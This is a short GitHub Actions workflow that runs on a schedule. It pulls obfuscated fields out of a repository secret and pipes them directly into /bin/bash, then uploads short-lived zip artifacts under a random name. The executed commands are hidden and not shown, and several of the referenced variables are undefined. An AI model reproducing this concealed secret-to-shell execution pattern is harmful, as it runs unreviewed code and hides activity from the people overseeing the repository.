name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '58 5,11,17,23 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Invoke
        env:
          n99: ${{ secrets.n99 }}
        run: |
          printf '%s' "$n99" | jq -r .wphls73 | /bin/bash
          printf '%s' "$tj8" | jq -r .akno184 | /bin/bash
          printf '%s' "$asn9902" | jq -r .vgyc8944 | /bin/bash
          echo $hnw20 | jq -r .oqmc63680 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: XwLxSRX6
          path: "*.zip"
          retention-days: 1
